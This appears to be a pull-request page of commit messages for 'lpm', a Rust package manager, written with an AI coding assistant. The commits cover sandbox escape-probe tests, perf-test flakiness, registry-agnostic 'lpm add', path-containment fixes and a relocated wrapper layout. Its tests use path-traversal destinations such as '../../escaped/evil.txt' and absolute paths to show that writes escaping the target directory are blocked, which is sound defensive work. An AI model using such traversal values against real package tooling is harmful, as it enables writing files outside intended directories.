sandbox's designed-in /tmp RW permission. The sandbox rule is correct (backed by the green-corpus `/tmp`-write test); the test setup was testing the wrong thing. Fix: relocate every forbidden probe onto `/var/tmp/<unique>` — a standard POSIX scratch dir that's user-writable on both macOS and Linux and is NOT referenced by any rule in describe_rules or the Seatbelt profile. Probes clean up after themselves (`remove_dir_all` at test end); the `!target.exists()` assertion still catches genuine sandbox escapes. Also uncovered and preserved: the in-module unit test `tmpdir_distinct_from_slash_tmp_gets_its_own_rule` was accidentally deleted in an earlier attempt at this fix — restored with the original semantics (additive `(spec.tmpdir, RW)` + blanket `/tmp` rule, both present). The additive behavior is intentional per Phase 46's §9.3 design and required by the compat-greens `/tmp` test. Ran locally on macOS arm64: - `cargo clippy --workspace --all-targets -- -D warnings` — clean - `cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast` — 4217/4217 pass, 7 skipped (mode-specific) - `cargo test -p lpm-sandbox` — 72 lib + 7 escape + 7 compat_greens = 86 tests, all green 🤖 Generated with [Claude Code](https://claude.com/claude-code) Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Two small CI fixes landing atop the 2026-04-23 sandbox probe-path correction (commit 10e75ac): **1. `lpm-task::filter::eval::tests::perf_eval_glob_200_members_under_500us_per_call`** Per-op budget test flaked on GitHub Actions Linux runner. Root cause: the `time_per_op` helper returned `total_elapsed_ns / iters` after a SINGLE round of `iters` iterations. A single 500 ms scheduler stall during the 500-iter loop amortized into +1 ms per-op — 2× the 500 µs debug budget. This wasn't a code regression; it was an unreliable measurement on shared hardware. Changed `time_per_op` to best-of-5 rounds: each round runs `iters_per_round` iterations independently, the minimum round's ns/op is returned. Rationale: a ns/op budget is asking "can this code hit this latency when the scheduler cooperates?" — a genuine regression in LPM's own code shifts ALL rounds (so the minimum moves too), whereas a single stall only hurts one round (min unaffected). Best-of-N gives us a regression detector that survives CI without masking actual slowdowns. All four perf tests (parse, exact-name, glob, closure-with-deps) now share the best-of-5 helper. Error messages updated to say "best-of-5" so the signal is discoverable. **2. Rustfmt 1.94.0 reflow** `cargo fmt` on pinned 1.94.0 (the CI toolchain) preferred `.join(format!(...))` chains wrapped differently from the local `rustfmt` default — harmless whitespace-only diff on `lpm-sandbox/src/linux.rs` and `lpm-sandbox/tests/escape_corpus.rs`. Reformatted to match CI. Ran locally: - `rustup run 1.94.0 cargo fmt --check` — clean - `cargo clippy --workspace --all-targets -- -D warnings` — clean - `cargo test -p lpm-task filter::eval::tests` — 54 pass 🤖 Generated with [Claude Code](https://claude.com/claude-code) Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
7 tasks
tolgaergin
added a commit
that referenced
this pull request
Apr 29, 2026
* phase-60 D2: promote download_tarball_routed helpers to RegistryClient
Behavior-preserving refactor extracting the two private routed-tarball
helpers from install.rs (download_tarball_routed,
download_tarball_streaming_routed) onto RegistryClient as public
methods. Both `lpm install` and the upcoming Phase 60 `lpm add` source-
delivery flow consume the same Custom-route auth-attachment logic.
- crates/lpm-registry/src/client.rs: add public methods
- crates/lpm-cli/src/commands/install.rs: switch all 5 call sites to
the new methods; delete the private helpers; remove the now-unused
DownloadedTarball import
All 602 install + npmrc tests still pass.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* phase-60 60.0.e: PackageMetadata::resolve_version_spec helper
Add a three-tier version-spec resolver on PackageMetadata covering
dist-tag → exact-version → semver-range, mirroring the canonical
pattern at install_global.rs:368-405 verbatim.
Pre-Phase-60, `lpm add react@beta`, `next@canary`, `lodash@^4` all
failed because PackageMetadata::version() is a pure HashMap lookup —
none of those literal strings exist as concrete versions. The new
helper closes the gap.
Per D3 (preplan): both parse-failure and no-satisfying-version
return LpmError::Script (matching install_global verbatim) so the
Phase 60.1 migration of the four duplicate sites (install_global,
install, update_global, global) is a true behavior-preserving
refactor.
9 unit tests cover dist-tag (latest/beta/canary), exact match,
caret/tilde range, no-satisfying error, parse-fail error, and
empty-versions error.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* phase-60 60.0+60.1+60.1.5+60.2: lpm add source delivery from any registry
Decouple `lpm add` from LPM-only package identity, mirror install's
full .npmrc setup, switch to file-spool tarball download, add
destination-side path containment, gate dep auto-install on
lpm.config.json presence, and surface external imports for the simple
path. End-to-end flow now works for any package on any registry the
rust client can reach (lpm.dev worker, npmjs.org direct, .npmrc-
declared private registries).
60.0.a + 60.0.b — Identity refactor + drop dotted-name auto-prepend
- New AddTarget enum: Lpm(PackageName) | Npm { spec: String }.
- New resolve_add_target replaces parse_package_ref. No rewriting
outside the @lpm.dev/ scope — `lodash.merge`, `tolga.foo`, etc.
resolve to AddTarget::Npm verbatim. Fixes a long-standing
correctness bug: pre-Phase-60 dotted bare names were silently
rewritten to @lpm.dev/<name> which doesn't exist on lpm.dev.
- All output / log / JSON sites render via target.display() /
target.json_name() — `name.scoped()` no longer used unconditionally.
- Skills branch type-encoded via `let AddTarget::Lpm(pkg) = &target`
pattern, with a why-comment (60.2) explaining the scope gate
(lpm.dev runs LLM scans on shipped skill content; arbitrary npm
packages are not scanned).
60.0.c — Mirror install's full .npmrc setup
- Build RouteTable::from_env_and_filesystem before any network call.
- Surface npmrc_warnings (non-JSON) and the strict-ssl=false security
warning (escapes --json). Clone the client with with_tls_overrides
so cafile= / strict-ssl=false take effect on metadata + tarball
fetches. Mirrors install.rs:3295-3445.
60.0.d — Routed metadata + file-spool tarball
- Metadata: AddTarget::Lpm uses get_package_metadata; AddTarget::Npm
uses get_npm_metadata_routed.
- Tarball: client.download_tarball_routed (D2 promoted helper) +
lpm_extractor::extract_tarball_from_file. Bounded memory via
MAX_COMPRESSED_TARBALL_SIZE (500 MB) for free; lpm add typescript
(~22 MB) and worst-case @scope/giant-fixture no longer load the
whole tarball into RAM.
60.0.f — Destination-side path containment (D6)
- New resolve_safe_dest helper canonicalizes target_dir once and
validates every write destination: refuses to follow existing
symlinks, rejects writes whose canonical parent escapes the target
root. Wired into the Step 8 file-copy loop. Closes the threat-model
gap that opened up when add expanded from "trusted lpm.dev
publishers" to "any npm publisher."
60.1 — Dep gate + bare-imports notice (D4)
- Tighten dep gate: `if !no_install_deps && lpm_config.is_some()`.
Simple path is download-manager: copy bytes, no auto-install.
- import_rewriter exports a sibling collect_bare_specifiers fn that
shares an internal SpecifierKind classifier with rewrite_imports
(anti-drift contract — "bare" means the same thing in both places).
- add.rs surfaces the collected externals as a non-JSON notice and
as a `external_imports` array in the JSON output.
60.1.5 — Non-interactive simple-path guard
- `lpm_config.is_none() && target_path.is_none() && (yes || json ||
!is_tty)` errors before the file-copy loop. Heuristically defaulting
components/ for arbitrary 3rd-party source under --yes/--json/non-TTY
is a CI/automation footgun.
Tests
- 15 unit tests in add.rs (resolve_add_target classification including
the dotted-name regression; resolve_safe_dest contracts including
symlink-refusal on Unix).
- 10 unit tests in import_rewriter.rs (classify_specifier,
collect_bare_specifiers).
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* phase-60 60.3: integration tests for lpm add simple path + guards + traversal
Three new wiremock-driven integration tests covering the highest-value
end-to-end scenarios for Phase 60:
- add_simple_non_interactive_without_path.rs (4 sub-tests) — proves
the 60.1.5 guard fires for --yes, --json, and non-TTY (stdin from
/dev/null) without --path; positive control with --path succeeds.
No package.json mutation in any failure case.
- add_source_npm_simple.rs (2 sub-tests) — full simple-path pipeline
via wiremock npm metadata + tarball: AddTarget::Npm resolves, file-
spool download, extract, files copied flat (no auto-nest), bare-
imports notice lists react + @radix-ui/react-slot, package.json
NOT mutated, .lpm/skills/ NOT created. JSON sub-test asserts the
package.name uses the npm-style identity (not @lpm.dev/-prefixed)
and the new external_imports array is well-shaped.
- add_path_traversal_dest_escape.rs — proves resolve_safe_dest is
wired into the actual write loop, not just unit-tested in
isolation. Tarball ships an lpm.config.json with files[0].dest =
"../../escaped/evil.txt" — assertion: containment-violation error,
exit non-zero, no file written outside target_dir.
Other 60.3 specced tests are either (i) covered by the unit tests
that landed alongside the implementation (#5 dotted-name, #9 version-
spec, #11 symlink — see preplan v6 audit checklist) or (ii)
deliberately deferred where the underlying machinery is already
test-covered by Phase 58.x install tests (#1 lpm.dev rich, #2 npm
rich, #6 npmrc auth, #7 strict-ssl, #8 missing-var fatal).
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* phase-60 60.4: README — lpm add now works against any registry
- Update the lpm add one-liner in the Commands list.
- Add a "How lpm add Works" section explaining: source delivery vs.
install, the firm naming rule (@lpm.dev/owner.name only), the rich
vs. simple paths, and the non-interactive --path requirement.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* phase-60 audit fix: resolve_safe_dest must validate before mkdir
Audit reproduced (with a temp-dir filesystem probe) that the landed
resolve_safe_dest helper still created directories OUTSIDE the
target_dir for two attack vectors before the containment error fired:
1. `dest_rel = "../../escaped/evil.txt"` — `Path::join` resolves
lexically; `dest.parent()` lands outside target; `create_dir_all`
ran before the containment check, leaving `<target>/../escaped/`
on disk even though the file write was correctly blocked.
2. Absolute `dest_rel = "/tmp/elsewhere/evil.txt"` — `Path::join` of
an absolute path returns the absolute path verbatim; `parent =
/tmp/elsewhere/`; `create_dir_all` created it before the
containment check fired.
The original integration test only asserted no escaped FILE existed,
so the directory-side-effect bug passed CI.
Fix
- Reorder resolve_safe_dest so EVERY check that can reject the
destination runs BEFORE any filesystem mutation:
Step 1 (NEW) — reject absolute dest_rel up-front.
Step 2 (NEW) — reject any ParentDir / RootDir / Prefix component.
Step 3 — refuse existing-symlink destinations.
Step 4 (NEW) — pre-mkdir ancestor canonicalization: walk up to the
longest existing ancestor; canonicalize; require it under
target_root_canonical (catches symlinked intermediate dirs).
Step 5 — create_dir_all (NOW safe).
Step 6 — post-mkdir re-canonicalize as TOCTOU defense-in-depth.
The lexical bans in Steps 1-2 kill the entire `../escape` and
absolute-path attack classes before any mkdir runs. The longest-
existing-ancestor walk in Step 4 covers the symlinked-intermediate
case (target/foo → /tmp/elsewhere). Step 6 is paranoia.
Tests
- Strengthen unit tests:
- resolve_safe_dest_dotdot_in_path_rejected_with_no_external_dir_created
now asserts no escape directory was created.
- resolve_safe_dest_absolute_dest_rejected_with_no_external_dir_created
is new — covers the absolute-path attack.
- resolve_safe_dest_dotdot_in_middle_of_path_also_rejected covers
`foo/../bar.txt` (lexically resolves back inside but still
rejected up-front).
- Extend integration test:
- dest_escape_via_dotdot_is_refused_and_creates_no_external_directory
now snapshots target_dir entries before the run and asserts no
unexpected new top-level entries appeared, plus no escape dir.
- dest_escape_via_absolute_path_is_refused_and_creates_no_external_directory
is new — covers the absolute-path attack at the integration level.
Net: 4923 → 4926 workspace tests; clippy + fmt clean; all green.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin
added a commit
that referenced
this pull request
Apr 30, 2026
…rs/ (Phase 61.1) The big lever — the isolated linker's per-package wrapper tree moves out of `node_modules/.lpm/` to `<project>/.lpm/wrappers/`. After the relayout, `rm -rf node_modules` no longer wipes the entire incremental linker cache, so the warm-install bench (and the user pattern Phase 57.2 surfaced — wiping node_modules after a teammate's lockfile change) actually exercises the incremental linker. Symlink-target shape changes (audit fix #1, v3): - Phase 3 root symlinks (canonical + aliases) gain one extra `..` segment and route through `<project>/.lpm/wrappers/<seg>/...`. Centralized in `LayoutPaths::root_symlink_target()` so the depth math (link-depth + 1) is computed in one place. - Phase 3.5 self-references unchanged — they target the project root, which doesn't move under Tier 2. - Phase 2 internal sibling-wrapper symlinks unchanged — both endpoints live inside `.lpm/wrappers/` so the relative `../../` shape is preserved. Drive-by audit fixes folded in: - #3 (bin-shim wrapper segment): `create_bin_links` now uses `pkg.wrapper_segment()` instead of hardcoding `format!("{safe}@{version}")`. Pre-fix, local-source deps with a `bin` field produced shims pointing at non-existent wrapper paths. - #7 (Windows junction `..` normalization): added a lexical-clean helper inside `create_symlink_or_junction`'s Windows arm so the `../.lpm/wrappers/...` shape doesn't embed an unresolved `..` segment in the path handed to `cmd /c mklink /J`. `cleanup_stale_entries` updates: - Explicitly creates `node_modules/` (pre-Tier-2 the wrapper-root `create_dir_all` covered both via parent recursion; now they're disjoint paths). - Skips dotfile entries (e.g., the new `.version` schema-tag) when sweeping stale wrappers. - Writes `<wrapper-root>/.version` (D6) for forward-compat shape detection. Test fixtures migrated to use `LayoutPaths` so they track production semantics on any future shape change. 4949 workspace tests pass; clippy --workspace -D warnings clean; cargo fmt clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
11 tasks
tolgaergin
added a commit
that referenced
this pull request
Apr 30, 2026
* feat(lpm-runtime): RuntimeStatus carries resolved managed-runtime bin
`Ready` and `Installed` now carry a `bin_dir: PathBuf` field — the
managed-runtime bin path that `node_bin_dir(&version)` already resolves
inside `ensure_runtime` and would otherwise discard. Downstream callers
(the PATH builder in `lpm-runner/bin_path`) can consume this hint to
skip a redundant `detect_node_version` + `list_installed` pass per
`lpm run` invocation.
For the `Installed` branch, defensively re-stat after install — if the
freshly-installed bin dir vanished mid-call (race / external tampering),
degrade to `NotInstalled` rather than panic.
This is the data-shape change that the rest of Phase 61 Tier 1 builds on.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* feat(lpm-runner): 3-state ManagedRuntimeHint + pre-resolved PATH builder
Adds `ManagedRuntimeHint { Bin(PathBuf) | Absent | Unknown }` plus
`build_path_with_bins_pre_resolved(start_dir, hint)`. The existing
public `build_path_with_bins` becomes a thin wrapper that passes
`Unknown` — preserving the silent-detect contract for callers that
don't go through `ensure_runtime` first (rebuild, dlx, hooks,
tools.rs, doctor, orchestrator).
Why three states, not `Option<PathBuf>`:
- `Bin(path)` — caller resolved the managed runtime: use it directly.
- `Absent` — caller called `ensure_runtime` and confirmed there
is no managed runtime to use. PATH builder skips the
silent re-detect entirely (the win on unpinned projects).
- `Unknown` — caller hasn't checked. Falls back to silent detect
(current pre-Phase-61 behavior).
Collapsing `Absent` and `Unknown` into one nullable would force the
silent re-detect on the unpinned-project path — the most common shape.
Two deterministic unit tests cover the contract: `_uses_hinted_bin`
asserts the produced PATH is exactly [nm_bin, hint_bin, ...inherited]
when `Bin(...)` is supplied (uses a non-existent fake path so any
re-stat would fail-loud); `_absent_skips_runtime` asserts the PATH is
exactly [nm_bin, ...inherited]. Both assert full structure rather than
substring presence/absence so they're robust to whatever managed-
runtime fragments the developer's PATH happens to contain.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* refactor(lpm-runner/script): thread bin_hint through script/command entrypoints
Extends every `pub fn run_*` in the script runner with a
`bin_hint: &ManagedRuntimeHint` parameter, routing each internal
PATH-build through `build_path_with_bins_pre_resolved` instead of the
silent-detect wrapper. Eight entrypoints touched:
- run_script, run_script_with_envs, run_script_captured
- run_script_buffered, run_script_prefixed
- run_command, run_command_captured, run_command_buffered,
run_command_prefixed
No backwards-compatibility shims — per CLAUDE.md "no `// removed`
comments, no shims, no parallel slow-path wrappers." Tests pass
`&ManagedRuntimeHint::Unknown` (imported as `Unknown` at the top of
the test mod for brevity).
Public API surface change is mechanical (one extra parameter); the
sole external consumer is `lpm-cli`, migrated in the next commit.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* refactor(lpm-cli): consume bin_hint, collapse cache-config reads, delete dead wrappers
Threads the `ManagedRuntimeHint` from `commands::run::ensure_runtime`
through the script-execution chain so the downstream PATH builder
doesn't redo `detect_node_version` + `list_installed` on every
`lpm run` invocation.
Signature changes:
- `commands::run::ensure_runtime` now returns `ManagedRuntimeHint`
(`Bin(bin_dir)` for Ready/Installed; `Absent` for NotInstalled and
NoRequirement).
- `run`, `run_multi`, `run_workspace`, `run_watch`, `exec`,
`run_tasks_sequential`, `run_tasks_parallel`, `run_task`, and
`run_task_captured` all gain a `bin_hint` parameter.
Caller migration:
- `main.rs:3102` (watch path) and `main.rs:3527` (External script
shortcut) capture the hint before calling `run_watch` / `run`.
- `dev.rs` captures `runtime_hint` via the existing `tokio::join!`
block instead of discarding it; threads to the dev script invocation.
- `migrate.rs::run_verification` resolves the hint once and reuses
it across the build + test verification scripts.
Caller contract: every callsite of `run` / `run_multi` / `run_watch`
/ `exec` MUST invoke `ensure_runtime` first — that's where the
user-visible "Using node X" notice + auto-install fire. Documented
on `pub async fn run` so future callers don't bypass it accidentally.
Cache-context dedup (Tier 1.4.2):
- `run` reads `lpm.json` once at the top instead of twice (cache-hit
check + caching-enabled check both used to read).
- Migrates the simple-script path to use the existing
`try_cache_hit_with_config` and `is_task_cached_with_config`
helpers — the no-config wrappers were only used by this one
callsite.
Dead-code removal (CLAUDE.md "no shims"):
- Delete `is_task_cached`, `try_cache_hit`, `try_cache_store_with_output`
— every other call site already used the `_with_config` variants.
- Delete the `is_task_cached_false_without_lpm_json` test that
exclusively exercised the deleted wrapper; the equivalent contract
is exercised by `is_task_cached_with_config_*` tests.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* perf(lpm-cli/run): Tier 1 follow-ups — workspace pin inheritance, parallel Arc reuse, is_meta_task plumbing
Three follow-ups that landed during the M/L review pass on top of the
base hint threading:
L1 — `is_meta_task` no longer reads `package.json` per call.
Caller (`run_multi`, `run_workspace_package`) extracts `pkg.scripts`
once and threads it down through `run_tasks_sequential` /
`run_tasks_parallel` / `is_meta_task`. The dependsOn-but-no-command
case previously paid one `package.json` read per task in the
parallel loop; now zero. The `is_meta_task_from_config` alias
collapses into the single `is_meta_task` since the helper is
filesystem-free now.
L2 — `run_tasks_parallel` wraps shared per-call state in `Arc`.
Pre-Tier-1: each spawned thread did a full `clone` of the hint,
the tasks `HashMap`, the `LpmJsonConfig`, and (post-L1) the
`pkg_scripts` `HashMap`. Post-Tier-1: each is `Arc::new`'d once
before the loop, threads do a refcount bump. Negligible per-thread
but avoids quadratic-feeling allocations on wide parallel levels.
L3 — workspace per-member calls inherit the root hint when the
member has no own pin.
`run_workspace_package` probes the member dir via
`lpm_runtime::detect::detect_node_version` (single-dir, no walk).
If the member has its own .nvmrc / engines / lpm.json runtime,
pass `Unknown` so the silent detect resolves the member-level
pin. If not, inherit the root hint. Matches user intuition that
the workspace-root pin governs the whole workspace (like nvm
walking parent dirs).
Small behavior change: a workspace member with NO own Node pin
now uses the root-resolved managed runtime instead of falling back
to system Node. Arguably a bug fix — pre-Tier-1 behavior was
inconsistent (root auto-installed Node 22 but member silently
ran on whatever `node` happened to be on PATH).
Plus the M/L review fixes batched in:
- M1: doc note on `pub async fn run` documenting the
`ensure_runtime`-must-be-called-first contract.
- M2/M3: `bin_path` test assertions tightened to compare the full
PATH segment list, not substring presence/absence (robust to
whatever managed-runtime fragments the developer's PATH happens
to contain).
- Style: `Default for ManagedRuntimeHint` returning `Unknown`; test
mods import `ManagedRuntimeHint::Unknown` so call sites read
`&Unknown` instead of `&ManagedRuntimeHint::Unknown`.
Measurement (n=101, time.perf_counter_ns(), M5 Mac, load avg ~3):
- Managed-runtime fixture (.nvmrc + 7 entries): ~150 µs / lpm run.
- No-managed-runtime fixture: ~60 µs / lpm run.
- bench/run.sh script-overhead (1ms resolution, n=21): within noise.
Sub-perceptible at ms resolution; preparatory plumbing for Tier 2
warm-path relayout. See preplan v3 status block for full numbers.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* refactor(lpm-linker): introduce LayoutPaths utility (Phase 61.0.5, no behavior change)
Centralizes wrapper / metadata / health-check path construction. Every
production callsite that built `node_modules/.lpm/...` paths inline now
goes through `LayoutPaths::for_project(project_dir).{isolated,hoisted}_*`.
61.0.5 contract: every helper returns the legacy path
(`node_modules/.lpm/`). No observable behavior change. 61.1 will flip
`isolated_*` to `<project>/.lpm/wrappers/...` as a single source-of-truth
edit; consumers migrate transparently.
Production migrations in this commit:
- `lpm-linker::cleanup_stale_entries`: wrapper-root construction
- `lpm-linker::link_one_package`: pkg-entry-dir + .linked marker
- `lpm-linker::link_finalize`: wrapper-root for bin link traversal
- `lpm-linker::link_packages_hoisted`: metadata path + nested-root (via
`hoisted_*` helpers, intentionally still scoped to `node_modules/`)
- `lpm-cli::commands::rebuild::live_package_dir`: isolated probe
`doctor.rs` predicate is intentionally NOT migrated here — its semantic
change (handling hoisted-no-conflicts via `install_appears_healthy()`)
lands in 61.4.
Adds `crates/lpm-linker/src/layout.rs` with 13 unit tests covering all
helpers including the 5 `InstallHealth` variants and the
`needs_layout_migration` invariant in 61.0.5.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* feat(lpm-linker): flip isolated wrapper root to <project>/.lpm/wrappers/ (Phase 61.1)
The big lever — the isolated linker's per-package wrapper tree moves
out of `node_modules/.lpm/` to `<project>/.lpm/wrappers/`. After the
relayout, `rm -rf node_modules` no longer wipes the entire incremental
linker cache, so the warm-install bench (and the user pattern Phase 57.2
surfaced — wiping node_modules after a teammate's lockfile change)
actually exercises the incremental linker.
Symlink-target shape changes (audit fix #1, v3):
- Phase 3 root symlinks (canonical + aliases) gain one extra `..`
segment and route through `<project>/.lpm/wrappers/<seg>/...`.
Centralized in `LayoutPaths::root_symlink_target()` so the depth
math (link-depth + 1) is computed in one place.
- Phase 3.5 self-references unchanged — they target the project root,
which doesn't move under Tier 2.
- Phase 2 internal sibling-wrapper symlinks unchanged — both endpoints
live inside `.lpm/wrappers/` so the relative `../../` shape is
preserved.
Drive-by audit fixes folded in:
- #3 (bin-shim wrapper segment): `create_bin_links` now uses
`pkg.wrapper_segment()` instead of hardcoding
`format!("{safe}@{version}")`. Pre-fix, local-source deps with a
`bin` field produced shims pointing at non-existent wrapper paths.
- #7 (Windows junction `..` normalization): added a lexical-clean
helper inside `create_symlink_or_junction`'s Windows arm so the
`../.lpm/wrappers/...` shape doesn't embed an unresolved `..`
segment in the path handed to `cmd /c mklink /J`.
`cleanup_stale_entries` updates:
- Explicitly creates `node_modules/` (pre-Tier-2 the wrapper-root
`create_dir_all` covered both via parent recursion; now they're
disjoint paths).
- Skips dotfile entries (e.g., the new `.version` schema-tag) when
sweeping stale wrappers.
- Writes `<wrapper-root>/.version` (D6) for forward-compat shape
detection.
Test fixtures migrated to use `LayoutPaths` so they track production
semantics on any future shape change. 4949 workspace tests pass;
clippy --workspace -D warnings clean; cargo fmt clean.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* feat(lpm-cli): rebuild.rs uses LayoutPaths + closes store-fallback hole (Phase 61.2)
Three things land together because they all touch `prepare_live_package_dir`:
D8a — store-fallback hard-error. Pre-Phase-61 the function returned
`Ok(store_path)` whenever the live probe fell through, letting the
caller chdir into canonical store bytes for a lifecycle script. On
macOS (clonefile, CoW) that was silent corruption on first write; on
Linux (hardlinks) the early `if !live.starts_with(store_root)` branch
skipped detach so the script ran against shared inodes. Either way, a
soundness violation. Post-fix the function returns `Err("...not linked
into project — refusing to run lifecycle script inside the store...")`
so failures are loud, actionable, and never corrupt the store.
Audit fix #4 — wrapper-segment shape. `live_package_dir` now takes a
`wrapper_id: Option<&str>` and computes the wrapper segment via
`LayoutPaths::wrapper_segment(name, version, wrapper_id)`. The same
helper `LinkTarget::wrapper_segment` delegates to (single source of
truth across the linker / rebuild / future doctor code paths). Pre-fix
the inline `format!("{safe}@{version}")` silently missed every
non-Registry source: a Directory / Link / Tarball / Git dep with a
lifecycle script had its wrapper probe fail and fall through to the
store. Post-fix `ScriptablePackage` carries the `wrapper_id` derived
from `lp.source` via `Source::source_id()`.
Audit fix #5 — test inversion. The pre-existing
`prepare_live_package_dir_does_not_detach_when_path_is_under_store_root`
test pinned the silent-fallback contract D8a inverts. Replaced with
`prepare_live_package_dir_errors_when_unlinked` asserting the new
`Err("...not linked into project...")` shape; canary-bytes-intact
assertion preserved.
Adjacent fix in `p6_triage_autoexec_reference.rs`: the test seeded
the store but not the wrapper, relying on the silent-fallback hole to
run lifecycle scripts. Added a `seed_wrapper` helper that materializes
`<project>/.lpm/wrappers/<seg>/node_modules/<name>/` from the store —
mirroring real post-install state. Pre-D8a the same fixture passed by
accident; the new state captures the actual contract.
`LayoutPaths::wrapper_segment` is the new cross-crate helper.
`LinkTarget::wrapper_segment` delegates to it so the two cannot drift.
4949 workspace tests pass; clippy --workspace -D warnings clean;
cargo fmt clean.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* feat(lpm-cli): layout-aware install_state + wrapper-layout migration (Phase 61.3)
Two pieces, both load-bearing per the v3 audit fix #2 / D8c:
1. Layout-aware freshness gate. `check_install_state` AND
`try_mtime_fast_path` now consult
`LayoutPaths::needs_layout_migration()` and force `up_to_date = false`
when a populated legacy `node_modules/.lpm/` coexists with an empty
`<project>/.lpm/wrappers/`. Without this gate, an upgrade-in-place
user (binary upgraded but `node_modules/` not wiped) hash-matches
on the install-hash check, the top-of-`main` fast lane
short-circuits, and the migration code path never runs — they stay
silently on the legacy layout until something else invalidates the
hash.
2. Migration code path inside `lpm install`. Right after the fast-exit
guard returns false, `migrate_legacy_wrapper_layout` checks the
same predicate and (when true) wipes `node_modules/.lpm/` so the
subsequent `cleanup_stale_entries` rebuilds at the new wrapper-root
location. No rename-first attempt — cross-FS rename hazards
(Linux containers, network FS, EXDEV) outweigh the saved relink
cost, which Phase 61 makes faster anyway. Best-effort wipe; legacy-
state quirks don't abort the install.
D9 — migration notice modes. Human-pretty mode prints a one-line
"migrating wrapper layout" notice via `output::info`; JSON / `--quiet`
/ non-TTY remain silent.
Tests added:
- `legacy_layout_present_forces_install_via_full_read` — hash matches
but migration is owed → `up_to_date = false`.
- `legacy_layout_present_forces_install_via_mtime_fast_path` — same
but with v2 mtime line; the mtime fast path bails to slow path.
- `empty_legacy_dir_does_not_force_install` — empty `.lpm/` doesn't
count as legacy.
- `populated_new_layout_does_not_force_install` — both populated →
migration considered complete; gate stops firing.
- `migrate_legacy_wrapper_layout_wipes_legacy_state` — happy path.
- `migrate_legacy_wrapper_layout_noop_when_not_owed` — no-op
on a fresh project (doesn't synthesize directories).
- `migrate_legacy_wrapper_layout_noop_when_both_populated` —
doesn't wipe on a mid-migration mixed state (real convergence
happens via the next normal install).
4956 workspace tests pass; clippy --workspace -D warnings clean;
cargo fmt clean.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* feat(lpm-cli): doctor + gitignore + sandbox comment refresh (Phase 61.4 + 61.5 + 61.7)
61.4 — `lpm doctor` predicate becomes layout-aware. The legacy
`nm.exists() && nm.join(".lpm").exists()` probe is replaced with
`LayoutPaths::install_appears_healthy()` plus a `needs_layout_migration()`
gate. The doctor now distinguishes:
- Healthy { Isolated } → "exists with .lpm/wrappers store"
- Healthy { Hoisted } → "exists with hoisted layout"
- Healthy { Mixed } → warn + remediation
- NodeModulesPresentButNoStore → warn (existing message preserved)
- NoNodeModules → fail (existing message preserved)
- legacy layout detected (migration owed) → warn pointing the user
at `lpm install` to converge
The hoisted-no-conflicts case (which the legacy predicate misreported
as "no .lpm store") now correctly classifies as healthy.
61.5 — `ensure_lpm_wrappers_gitignore` runtime helper. Mirrors
`ensure_skills_gitignore` (and the lpm-vault / npmrc siblings):
runtime "ensure once" pattern, idempotent, OpenOptions-append to
narrow the TOCTOU window. Marker is `.lpm/wrappers/`. Wired into the
install entry point alongside `migrate_legacy_wrapper_layout`.
61.7 — sandbox comment refresh. `landlock_rules.rs` explanatory
comment referenced `{project}/node_modules/.lpm/`; updated to mention
the post-Phase-61.1 `<project>/.lpm/wrappers/` location. The actual
ReadWrite rule at line 103 already grants `<project>/.lpm` so the
post-relayout location was already covered — comment-only change,
no functional impact.
Tests added:
- `ensure_lpm_wrappers_gitignore_appends_entry`
- `ensure_lpm_wrappers_gitignore_no_duplicate`
- `ensure_lpm_wrappers_gitignore_creates_when_no_gitignore`
4959 workspace tests pass; clippy --workspace -D warnings clean;
cargo fmt clean; no fancy-regex.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* fix(lpm-linker): retarget legacy root symlinks + dotfile-aware layout predicates
Two audit fixes (round 2 of Phase 61 review):
CRITICAL — legacy root-symlink retarget. Pre-fix, the 61.3 migration
wiped `node_modules/.lpm/` but never touched root symlinks at
`node_modules/<pkg>` whose targets pointed into the legacy
wrapper-root shape. Phase 3's `if root_link.exists()` guard skipped
recreation, so an upgrade-in-place install left dangling symlinks —
the wrapper tree was wiped, but `node_modules/<pkg>` still pointed at
the old location and stayed broken.
Fix: `cleanup_stale_entries`'s root-symlink sweep gains a second
predicate. Beyond the existing "not in `direct_names`" stale-name
removal, it now ALSO removes any root symlink whose target traverses
a `.lpm/` segment NOT followed by `wrappers/` (legacy shape). Phase 3
recreates with the correct new target. Walks `Path::components()`
so the predicate is robust to path-separator style and to whether
the relative target leads with `.lpm/` (unscoped) or `../.lpm/`
(scoped). Self-refs (target = `..`, no `.lpm`) and workspace-member
symlinks (target outside `.lpm/`) are unaffected.
5 new tests:
- `cleanup_stale_entries_removes_legacy_shape_root_symlink`
- `cleanup_stale_entries_preserves_new_shape_root_symlink`
- `cleanup_stale_entries_preserves_workspace_member_symlink`
- `cleanup_stale_entries_preserves_self_reference_symlink`
- `link_finalize_retargets_legacy_root_symlink_after_migration`
(end-to-end: post-migration install produces a working symlink
resolving to a real `package.json`)
MEDIUM — `.version` schema-tag must not mask migration. The 61.1
`.version` write at the wrapper root happens BEFORE any wrapper is
materialized; pre-fix, `dir_is_nonempty` counted `.version` as
evidence of a populated layout, so a half-completed install (or any
state where the new root has only `.version`) would silently mask a
needed migration AND make `lpm doctor` report a healthy isolated
